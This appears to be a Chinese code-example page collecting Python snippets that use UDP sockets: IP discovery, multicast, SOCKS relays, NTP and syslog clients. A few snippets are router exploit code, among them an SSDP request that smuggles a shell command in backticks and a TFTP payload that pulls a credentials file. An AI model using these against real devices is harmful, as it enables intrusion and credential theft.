我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用socket.SOCK_DGRAM。
def get_iphostname(): '''??linux?????????IP??''' def get_ip(ifname): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ipaddr = socket.inet_ntoa(fcntl.ioctl( sock.fileno(), 0x8915, # SIOCGIFADDR struct.pack('256s', ifname[:15]) )[20:24] ) sock.close() return ipaddr try: ip = get_ip('eth0') except IOError: ip = get_ip('eno1') hostname = socket.gethostname() return {'hostname': hostname, 'ip':ip}
def setup_sockets(self): self.sockets = {} ip_addresses = get_interface_addresses(self.logger) self.ip_addresses = ip_addresses multi_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) multi_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) multi_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, self.ttl) for ip in ip_addresses: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) mreq=socket.inet_aton(self.address)+socket.inet_aton(ip) multi_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) self.logger.info("Regestering multicast for: %s: %s"%(self.address, ip)) sock.bind((ip, self.port)) self.sockets[ip] = sock multi_sock.bind(("", self.port)) self.socks = [self.sockets[x] for x in self.sockets.keys()] self.multi_sock = multi_sock
def _timed_out(self): if self._rsock and self._rsock.type & socket.SOCK_STREAM: if self._read_overlap or self._write_overlap: win32file.CancelIo(self._fileno) if self._read_task: if self._rsock and self._rsock.type & socket.SOCK_DGRAM: self._notifier.clear(self, _AsyncPoller._Read) self._read_fn = None self._read_task.throw(socket.timeout('timed out')) self._read_result = self._read_task = None if self._write_task: if self._rsock and self._rsock.type & socket.SOCK_DGRAM: self._notifier.clear(self, _AsyncPoller._Write) self._write_fn = None self._write_task.throw(socket.timeout('timed out')) self._write_result = self._write_task = None
def get_my_ip(): """ Returns the actual ip of the local machine. This code figures out what source address would be used if some traffic were to be sent out to some well known address on the Internet. In this case, a Google DNS server is used, but the specific address does not matter much. No traffic is actually sent. """ try: csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) csock.connect(('8.8.8.8', 80)) (addr, port) = csock.getsockname() csock.close() return addr except socket.error: return "127.0.0.1"
def output(data, udp): """ output the sensor backlog data, in JSON format always output to stdout output to udp if so specified """ print data if udp is None: return try: sockaddr_components = udp.split(':') ip = socket.gethostbyname(sockaddr_components[0]) port = int(sockaddr_components[1]) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(data + '\n', (ip, port)) except Exception, e: print e return
def __init__(self, address=('localhost', SYSLOG_UDP_PORT), facility=LOG_USER, socktype=socket.SOCK_DGRAM): """ Initialize a handler. If address is specified as a string, a UNIX socket is used. To log to a local syslogd, "SysLogHandler(address="/dev/log")" can be used. If facility is not specified, LOG_USER is used. """ logging.Handler.__init__(self) self.address = address self.facility = facility self.socktype = socktype if isinstance(address, basestring): self.unixsocket = 1 self._connect_unixsocket(address) else: self.unixsocket = 0 self.socket = socket.socket(socket.AF_INET, socktype) if socktype == socket.SOCK_STREAM: self.socket.connect(address) self.formatter = None
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, *args, **kwargs): if type not in (socket.SOCK_STREAM, socket.SOCK_DGRAM): msg = "Socket type must be stream or datagram, not {!r}" raise ValueError(msg.format(type)) super(socksocket, self).__init__(family, type, proto, *args, **kwargs) self._proxyconn = None # TCP connection to keep UDP relay alive if self.default_proxy: self.proxy = self.default_proxy else: self.proxy = (None, None, None, None, None, None) self.proxy_sockname = None self.proxy_peername = None self._timeout = None
def sendto(self, bytes, *args, **kwargs): if self.type != socket.SOCK_DGRAM: return super(socksocket, self).sendto(bytes, *args, **kwargs) if not self._proxyconn: self.bind(("", 0)) address = args[-1] flags = args[:-1] header = BytesIO() RSV = b"\x00\x00" header.write(RSV) STANDALONE = b"\x00" header.write(STANDALONE) self._write_SOCKS5_address(address, header) sent = super(socksocket, self).send(header.getvalue() + bytes, *flags, **kwargs) return sent - header.tell()
def recvfrom(self, bufsize, flags=0): if self.type != socket.SOCK_DGRAM: return super(socksocket, self).recvfrom(bufsize, flags) if not self._proxyconn: self.bind(("", 0)) buf = BytesIO(super(socksocket, self).recv(bufsize + 1024, flags)) buf.seek(2, SEEK_CUR) frag = buf.read(1) if ord(frag): raise NotImplementedError("Received UDP packet fragment") fromhost, fromport = self._read_SOCKS5_address(buf) if self.proxy_peername: peerhost, peerport = self.proxy_peername if fromhost != peerhost or peerport not in (0, fromport): raise socket.error(EAGAIN, "Packet filtered") return (buf.read(bufsize), (fromhost, fromport))
def source_interface(address, port=80, ip_version=None): """Figure out what local interface is being used to reach an address. Returns a tuple of (address, interface_name) """ sock = socket.socket( socket.AF_INET6 if ip_version == 6 else socket.AF_INET, socket.SOCK_DGRAM) try: sock.connect((address, port)) except socket.error: return (None, None) interface_address = sock.getsockname()[0] sock.close() interface_name = address_interface(interface_address, ip_version=ip_version) if interface_name: return (interface_address, interface_name) return (None, None)
def get_current_SNTP_time(sntp_server=SNTP_SERVER): """ Acquires current time in UTC secs from SNTP server. """ """ Thanks to Simon Foster's "Simple (very) SNTP client" recipe: http://code.activestate.com/recipes/117211/ """ try: client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) data = '\x1b' + 47 * '\0' client.sendto(data, (sntp_server, SNTP_PORT)) data, address = client.recvfrom(1024) if data: utc_secs = struct.unpack('!12I', data)[10] utc_secs -= TIME_1970 return utc_secs except Exception, e: print "get_current_SNTP_time failed:", sntp_server return None # ============================================================================== # OS_set_datetime # ==============================================================================
def getipaddr(self, ifname='eth0'): import socket import struct ret = '127.0.0.1' try: ret = socket.gethostbyname(socket.getfqdn(socket.gethostname())) except: pass if ret == '127.0.0.1': try: import fcntl s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ret = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', ifname[:15]))[20:24]) except: pass return ret
def handle_event(self, sock, fd, event): if sock != self._sock: return if event & eventloop.POLL_ERR: logging.error('dns socket err') self._loop.remove(self._sock) self._sock.close() # TODO when dns server is IPv6 self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.SOL_UDP) self._sock.setblocking(False) self._loop.add(self._sock, eventloop.POLL_IN, self) else: data, addr = sock.recvfrom(1024) if addr not in self._servers: logging.warn('received a packet other than our dns') return self._handle_data(data)
def _socket_bind_addr(self, sock, af): bind_addr = '' if self._bind and af == socket.AF_INET: bind_addr = self._bind elif self._bindv6 and af == socket.AF_INET6: bind_addr = self._bindv6 bind_addr = bind_addr.replace("::ffff:", "") if bind_addr in self._ignore_bind_list: bind_addr = None if bind_addr: local_addrs = socket.getaddrinfo(bind_addr, 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP) if local_addrs[0][0] == af: logging.debug("bind %s" % (bind_addr,)) try: sock.bind((bind_addr, 0)) except Exception as e: logging.warn("bind %s fail" % (bind_addr,))
def get_NTP_time(): NTP_QUERY = bytearray(48) NTP_QUERY[0] = 0x1b addr = socket.getaddrinfo(NTP_HOST, NTP_PORT)[0][-1] s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(NTP_QUERY, addr) # Setting timeout for receiving data. Because we're using UDP, # there's no need for a timeout on send. s.settimeout(2) msg = None try: msg = s.recv(48) except OSError: pass finally: s.close() if msg is None: return None import struct val = struct.unpack("!I", msg[40:44])[0] return val - NTP_DELTA
def ack_loop(): listen_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) listen_sock.bind(('', 9033)) listen_sock.settimeout(5) # 5 second timeout # wait for an ack try: data, addr = listen_sock.recvfrom(2048) if json.loads(data)['ack']: print 'Got ack from', addr state['ack'] = True else: state['ack'] = False except socket.timeout: print 'Didn\'t get ACK from client' state['ack'] = False
def bind(self, addr, port, tos, ttl, df): log.debug( "bind(addr=%s, port=%d, tos=%d, ttl=%d)", addr, port, tos, ttl) self.socket = socket.socket( socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, tos) self.socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind((addr, port)) if df: if (sys.platform == "linux2"): self.socket.setsockopt(socket.SOL_IP, 10, 2) elif (sys.platform == "win32"): self.socket.setsockopt(socket.SOL_IP, 14, 1) elif (sys.platform == "darwin"): log.error("do-not-fragment can not be set on darwin") else: log.error("unsupported OS, ignore do-not-fragment option") else: if (sys.platform == "linux2"): self.socket.setsockopt(socket.SOL_IP, 10, 0)
def __init__(self): """ Start the client, subscribe to "test" and start the loop """ super(MQSUB, self).__init__() # super().on_connect = self.on_connect # super().on_message = self.on_message self.start = 0 self.end = 0 self.message_count = 0 # determine current IP address of the local computer s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # use the google dns s.connect(('8.8.8.8', 0)) self.ip_address = s.getsockname()[0] self.connect(self.ip_address, 1883, 60) self.subscribe("test", 0) self.loop_forever()
def onready(notify_socket, timeout): """Wait for systemd style notification on the socket. :param notify_socket: local socket address :type notify_socket: string :param timeout: socket timeout :type timeout: float :returns: 0 service ready 1 service not ready 2 timeout occurred """ sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) sock.settimeout(timeout) sock.bind(_abstractify(notify_socket)) try: msg = sock.recv(512) except socket.timeout: return 2 finally: sock.close() if 'READY=1' in msg: return 0 else: return 1
def sendto(self, bytez, *args, **kwargs): if self.type != socket.SOCK_DGRAM: return _BaseSocket.sendto(self, bytez, *args, **kwargs) if not self._proxyconn: self.bind(("", 0)) address = args[-1] flags = args[:-1] header = BytesIO() r_s_v = b"\x00\x00" header.write(r_s_v) s_t_a_n_d_a_l_o_n_e = b"\x00" header.write(s_t_a_n_d_a_l_o_n_e) self._write_socks5_address(address, header) sent = _BaseSocket.send(self, header.getvalue() + bytez, *flags, **kwargs) return sent - header.tell()
def recvfrom(self, bufsize, flags=0): if self.type != socket.SOCK_DGRAM: return _BaseSocket.recvfrom(self, bufsize, flags) if not self._proxyconn: self.bind(("", 0)) buf = BytesIO(_BaseSocket.recv(self, bufsize, flags)) buf.seek(+2, SEEK_CUR) frag = buf.read(1) if ord(frag): raise NotImplementedError("Received UDP packet fragment") fromhost, fromport = _read_socks5_address(buf) if self.proxy_peername: peerhost, peerport = self.proxy_peername if fromhost != peerhost or peerport not in (0, fromport): raise socket.error(EAGAIN, "Packet filtered") return buf.read(), (fromhost, fromport)
def activate(self): print "udp_server plugin" print self.args if len(self.args) > 0: self.ip = self.args[0] if len(self.args) > 1: self.port = int(self.args[1]) # init network print "Selecting raw UDP streaming. IP: ", self.ip, ", port: ", str( self.port) self.server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) print "Server started on port " + str(self.port)
def check(self): response = "" payload = "\x00" * 8 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10.0) try: sock.sendto(payload, (self.target, 53413)) response = sock.recv(1024) except Exception: pass if response.endswith("\xD0\xA5Login:"): return True # target is vulnerable elif response.endswith("\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00"): return True # target is vulnerable return False # target is not vulnerable
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending payload") sock.sendto(self.payload, (self.target, 69)) try: response = sock.recv(2048) except Exception: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): if "UseUserCredential" in response: print_success("Exploit success - file {}".format("SPDefault.cnf.xml")) print_info(response) else: print_error("Exploit failed - credentials not found in response") else: print_error("Exploit failed - empty response")
def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) print_status("Sending exploit payload") sock.sendto(self.payload, (self.target, 43690)) try: print_status("Waiting for response") response = sock.recv(1024) except Exception: print_error("Exploit failed - device seems to be not vulnerable") return if len(response): print_success("Exploit success") print_info(response)
def execute(self, cmd): buf = ("M-SEARCH * HTTP/1.1\r\n" "Host:239.255.255.250:1900\r\n" "ST:uuid:`" + cmd + "`\r\n" "Man:\"ssdp:discover\"\r\n" "MX:2\r\n\r\n") try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) sock.connect((self.target, 1900)) sock.send(buf) sock.close() except socket.error: pass return ""
def check(self): buf = ("M-SEARCH * HTTP/1.1\r\n" "Host:239.255.255.250:1900\r\n" "ST:upnp:rootdevice\r\n" "Man:\"ssdp:discover\"\r\n" "MX:2\r\n\r\n") try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10) sock.connect((self.target, 1900)) sock.send(buf) response = sock.recv(65535) sock.close() except Exception: return False # target is not vulnerable if "Linux, UPnP/1.0, DIR-" in response: return True # target is vulnerable return False # target is not vulnerable
def log_event(event_tuple): try: sec, usec, src_ip, dst_ip = event_tuple[0], event_tuple[1], event_tuple[2], event_tuple[4] if not any(_ in WHITELIST for _ in (src_ip, dst_ip)): localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec) event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:])) if not config.DISABLE_LOCAL_LOG_STORAGE: handle = get_event_log_handle(sec) os.write(handle, event) if config.LOG_SERVER: remote_host, remote_port = config.LOG_SERVER.split(':') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port))) if config.DISABLE_LOCAL_LOG_STORAGE and not config.LOG_SERVER: sys.stdout.write(event) sys.stdout.flush() except (OSError, IOError): if config.SHOW_DEBUG: traceback.print_exc()
def __init__(self, port=17935, clients=[], broadcast=True): util.Thread.__init__(self) self.port = port self.clients = clients msg = '\x00'.join(["PyritServerAnnouncement", '', str(port)]) md = hashlib.sha1() md.update(msg) self.msg = msg + md.digest() self.ucast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) if broadcast: self.bcast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.bcast_sckt.bind(('', 0)) self.bcast_sckt.setsockopt(socket.SOL_SOCKET, \ socket.SO_BROADCAST, 1) else: self.bcast_sckt = None self.setDaemon(True) self.start()
def _systemd_notify_once(): """Send notification once to Systemd that service is ready. Systemd sets NOTIFY_SOCKET environment variable with the name of the socket listening for notifications from services. This method removes the NOTIFY_SOCKET environment variable to ensure notification is sent only once. """ notify_socket = os.getenv('NOTIFY_SOCKET') if notify_socket: if notify_socket.startswith('@'): # abstract namespace socket notify_socket = '\0%s' % notify_socket[1:] sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) with contextlib.closing(sock): try: sock.connect(notify_socket) sock.sendall(b'READY=1') del os.environ['NOTIFY_SOCKET'] except EnvironmentError: LOG.debug("Systemd notification failed", exc_info=True)
def getIfConfig(ifname): ifreq = {'ifname': ifname} infos = {} sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # offsets defined in /usr/include/linux/sockios.h on linux 2.6 infos['addr'] = 0x8915 # SIOCGIFADDR infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR infos['netmask'] = 0x891b # SIOCGIFNETMASK try: for k,v in infos.items(): ifreq[k] = _ifinfo(sock, v, ifname) except: pass sock.close() return ifreq
def client(): """ Procedimento responsável por enviar dados para o servidor e receber alguma resposta por conta disso """ text = input("Digite algum texto:\n") # Recebe dados data = text.encode(ENCODE) # Codifica para BASE64 os dados de entrada #Enviando de dados sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Inicializar um socket UDP dest = (HOST, PORT) # Define IP de origem e Porta de destino sock.sendto(data, dest) # Envia os dados para o destino #Resposta de envio ao servidor print(sock.getsockname()) # Imprime dados do socker de destino data, address = sock.recvfrom(MAX_BYTES) # Recebendo dados text = data.decode(ENCODE) # Convertendo dados de BASE64 para UTF-8 print(address, text) # Imprime texto e endereços #Fechando Socket sock.close()
def server(): #Abrindo um socket UDP na porta 5000 orig = (HOST, PORT) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(orig) while True: #recebi dados data, address = sock.recvfrom(MAX_BYTES) # Recebi dados do socket text = data.decode(ENCODE) # Convertendo dados de BASE64 para UTF-8 print(address, text) #Envia resposta text = "Total de dados recebidos: " + str(len(data)) data = text.encode(ENCODE) # Codifica para BASE64 os dados sock.sendto(data, address) # Enviando dados
def __init__(self, address, callback, host, port, device_type=None, backend='auto', interface=None): self.address = address self.callback = callback self.device_type = device_type self.interface = interface self.HOST = host #'192.168.1.118' self.PORT = port #9999 self.s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) if backend == 'auto': if platform == "linux" or platform == "linux2": self.backend = 'gatt' else: self.backend = 'bgapi' elif backend in ['gatt', 'bgapi']: self.backend = backend else: raise(ValueError('Backend must be auto, gatt or bgapi'))
def handle_event(self, sock, fd, event): if sock != self._sock: return if event & eventloop.POLL_ERR: logging.error('dns socket err') self._loop.remove(self._sock) self._sock.close() # TODO when dns server is IPv6 self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.SOL_UDP) self._sock.setblocking(False) self._loop.add(self._sock, eventloop.POLL_IN, self) else: data, addr = sock.recvfrom(1024) if addr[0] not in self._servers: logging.warn('received a packet other than our dns') return self._handle_data(data)
def _test_dtls_ciphersuite(self, server_connectivity_info, dtls_version, cipher, port): """This function is used by threads to it investigates with support the cipher suite on server, when DTLS protocol(s) is/are tested. Returns instance of class AcceptCipher or RejectCipher. Args: server_connectivity_info (ServerConnectivityInfo): contains information for connection on server dtls_version (str): contains SSL/TLS protocol version, which is used to connect cipher (str): contains OpenSSL shortcut for identification cipher suite port (int): contains port number for connecting comunication. """ cnx = SSL.Context(dtls_version) cnx.set_cipher_list(cipher) conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) try: conn.connect((server_connectivity_info.ip_address, port)) conn.do_handshake() except SSL.Error as e: error_msg = ((e[0])[0])[2] cipher_result = RejectCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher], error_msg) else: cipher_result = AcceptCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher]) finally: conn.shutdown() conn.close() return cipher_result
def test_dtls_protocol_support(self, server_connectivity_info, dtls_version, port): """Tests if DTLS protocols are supported by server. Returns true if server supports protocol otherwise returns false. Args: server_connectivity_info (ServerConnectivityInfo): contains information for connection on server dtls_protocol (str): contains version of DTLS protocol, which is supposed to be tested port (int): contains port number for connecting comunication. """ cnx = SSL.Context(dtls_version) cnx.set_cipher_list('ALL:COMPLEMENTOFALL') conn = SSL.Connection(cnx,socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) try: conn.connect((server_connectivity_info.ip_address, port)) conn.do_handshake() except SSL.SysCallError as ex: if ex[0] == 111: raise ValueError('LuckyThirteenVulnerabilityTesterPlugin: It is entered wrong port for DTLS connection.') else: support = False else: support = True finally: conn.shutdown() conn.close() return support
def test_sock_connect_address(self): # In debug mode, sock_connect() must ensure that the address is already # resolved (call _check_resolved_address()) self.loop.set_debug(True) addresses = [(socket.AF_INET, ('www.python.org', 80))] if support.IPV6_ENABLED: addresses.extend(( (socket.AF_INET6, ('www.python.org', 80)), (socket.AF_INET6, ('www.python.org', 80, 0, 0)), )) for family, address in addresses: for sock_type in (socket.SOCK_STREAM, socket.SOCK_DGRAM): sock = socket.socket(family, sock_type) with sock: sock.setblocking(False) connect = self.loop.sock_connect(sock, address) with self.assertRaises(ValueError) as cm: self.loop.run_until_complete(connect) self.assertIn('address must be resolved', str(cm.exception))
def sendto(self, bytes, *args, **kwargs): if self.type != socket.SOCK_DGRAM: return _BaseSocket.sendto(self, bytes, *args, **kwargs) if not self._proxyconn: self.bind(("", 0)) address = args[-1] flags = args[:-1] header = BytesIO() RSV = b"\x00\x00" header.write(RSV) STANDALONE = b"\x00" header.write(STANDALONE) self._write_SOCKS5_address(address, header) sent = _BaseSocket.send(self, header.getvalue() + bytes, *flags, **kwargs) return sent - header.tell()
def get_local_ip(): """Try to determine the local IP address of the machine.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Use Google Public DNS server to determine own IP sock.connect(('8.8.8.8', 80)) return sock.getsockname()[0] except socket.error: return socket.gethostbyname(socket.gethostname()) finally: sock.close() # Taken from http://stackoverflow.com/a/23728630